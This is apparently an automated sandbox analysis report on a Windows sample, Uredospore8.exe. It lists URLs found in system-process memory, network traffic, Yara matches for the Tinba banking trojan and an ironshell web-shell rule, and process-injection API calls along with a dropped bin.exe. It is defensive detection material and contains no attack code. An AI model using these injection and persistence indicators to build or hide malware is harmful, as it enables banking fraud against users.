Source: svchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com
Source: explorer.exe, 00000004.00000003.2979250085.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2196219993.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2979898080.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076151253.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076523652.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450962269.000000000C4BD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.comt
Source: SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: SearchApp.exe, 0000000D.00000000.2273444241.000002727D37C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: SearchApp.exe, 0000000D.00000000.2273444241.000002727D3A2000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2264186736.000002727C2B2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: explorer.exe, 00000004.00000003.2980021268.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450243606.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981054570.000000000C364000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981252114.000000000C374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076032675.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075818736.000000000C377000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000004.00000000.2195839667.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000004.00000000.2195839667.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3431957145.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com
Source: svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets
Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.com/v1/assets/$batch
Source: svchost.exe, 00000006.00000002.3361155429.000001A798043000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219337012.000001A798043000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.activity.windows.comP
Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: svchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://bn2-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000007.00000000.2222215269.000001F698700000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3383112196.000001F698700000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.onenote.net/livetile/?Language=en-GB
Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.coms
Source: SearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fb.me/react-polyfills
Source: SearchApp.exe, 0000000D.00000000.2281804728.0000027A7DEF0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://fb.me/react-polyfillsThis
Source: svchost.exe, 00000006.00000000.2219376900.000001A798065000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3362446755.000001A798065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://global.notify.windows.com/v2/register/xplatform/device
Source: explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2300739349.0000027A8007D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284459655.0000027A7E313000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284459655.0000027A7E313000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.local
Source: svchost.exe, 00000006.00000000.2219421842.000001A798088000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3363861560.000001A798088000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.local/
Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.net
Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://login.windows.net/
Source: SearchApp.exe, 0000000D.00000000.2274494136.0000027A7D51C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2301318078.0000027A80184000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://mths.be/fromcodepoint
Source: SearchApp.exe, 0000000D.00000000.2306449484.0000027A80982000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://ntp.msn.com/web-widget?form=M
Source: explorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: SearchApp.exe, 0000000D.00000000.2325343319.0000027A916C8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.office.com/M365.Access394866fc-eedb-4f01-8536-3ff84b16be2a72f988bf-86f1-41af-91ab-2d
Source: SearchApp.exe, 0000000D.00000000.2318850916.0000027A91528000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.office.com/M365.AccessZ
Source: explorer.exe, 00000004.00000000.2198248903.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcembere
Source: SearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
Source: SearchApp.exe, 0000000D.00000000.2329926503.0000027A91A9C000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2302447567.0000027A80400000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2306685905.0000027A809C7000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2331674767.0000027A91B30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://substrate.office.com
Source: SearchApp.exe, 0000000D.00000000.2329609042.0000027A91A70000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://substrate.office.com/M365.Access
Source: SearchApp.exe, 0000000D.00000000.2286028809.0000027A7E508000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://substrate.office.com/SubstrateSearch-Internal.ReadWrite
Source: SearchApp.exe, 0000000D.00000000.2307269362.0000027A80A2C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://substrate.office.com/dsapi/v1.0/
Source: SearchApp.exe, 0000000D.00000000.2281866725.0000027A7DF30000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://substrate.office.com/search/api651e5875e6d946c7adbf63b2ebc3ea64https://loki.delve.office.com
Source: SearchApp.exe, 0000000D.00000000.2307269362.0000027A80A2C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://substrate.office365.us
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000004.00000000.2196219993.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000004.00000003.2980021268.000000000C354000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3450243606.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981054570.000000000C364000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981252114.000000000C374000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3076032675.000000000C377000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3075818736.000000000C377000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/j
Source: StartMenuExperienceHost.exe, 0000000A.00000000.2237868953.00000275A062D000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000A.00000002.3413264410.00000275A062D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000004.00000003.2981503378.000000000C06D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.2981993470.000000000C086000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3447389765.000000000C071000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2198248903.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/play/games/archery-king/cg-9n5gkc4t7lzz"
Source: SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31
Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31"
Source: SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w
Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w"
Source: SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817
Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817"
Source: SearchApp.exe, 0000000D.00000000.2275895403.0000027A7D5E1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1
Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1"
Source: SearchApp.exe, 0000000D.00000000.2282936536.0000027A7E223000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/de-ch/play?ocid=winpsearchboxexpcta2&cgfrom=cg_dsb_seeMore"
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
Source: SearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=w
Source: SearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
Source: SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
Source: SearchApp.exe, 0000000D.00000000.2330801653.0000027A91ACA000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000D.00000000.2284822249.0000027A7E3D1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
Source: explorer.exe, 00000004.00000002.3402298833.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2194228969.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xsts.auth.xboxlive.com
Source: svchost.exe, 00000006.00000002.3364968286.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000000.2219449635.000001A7980AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xsts.auth.xboxlive.com/
Source: SearchApp.exe, 0000000D.00000000.2284398647.0000027A7E2F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://xsts.auth.xboxlive.comwy

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Tinba Banker

Source: Yara match

File source: Process Memory Space: winver.exe PID: 616, type: MEMORYSTR

E-Banking Fraud

Yara detected Tinba Banker

Source: Yara match

File source: Process Memory Space: winver.exe PID: 616, type: MEMORYSTR

Source: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10D

Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR

Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls

Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_00700655 NtWriteVirtualMemory,	0_2_00700655
Source: C:\Users\user\Desktop\Uredospore8.exe	Code function: 0_2_007005BC ReadProcessMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,	0_2_007005BC
Source: C:\Windows\explorer.exe	Code function: 4_2_00F822BA NtQueryDirectoryFile,	4_2_00F822BA
Source: C:\Windows\explorer.exe	Code function: 4_2_00F8221B NtEnumerateValueKey,	4_2_00F8221B
Source: C:\Windows\explorer.exe	Code function: 4_2_00F81F2B NtCreateUserProcess,	4_2_00F81F2B
Source: C:\Windows\System32\sihost.exe	Code function: 5_2_00D0221B NtEnumerateValueKey,	5_2_00D0221B
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 19_2_001C16C0 NtResumeThread,	19_2_001C16C0
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 19_2_001C15E4 NtCreateUserProcess,	19_2_001C15E4
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 19_2_02250655 NtWriteVirtualMemory,	19_2_02250655
Source: C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe	Code function: 19_2_022505BC ReadProcessMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,	19_2_022505BC
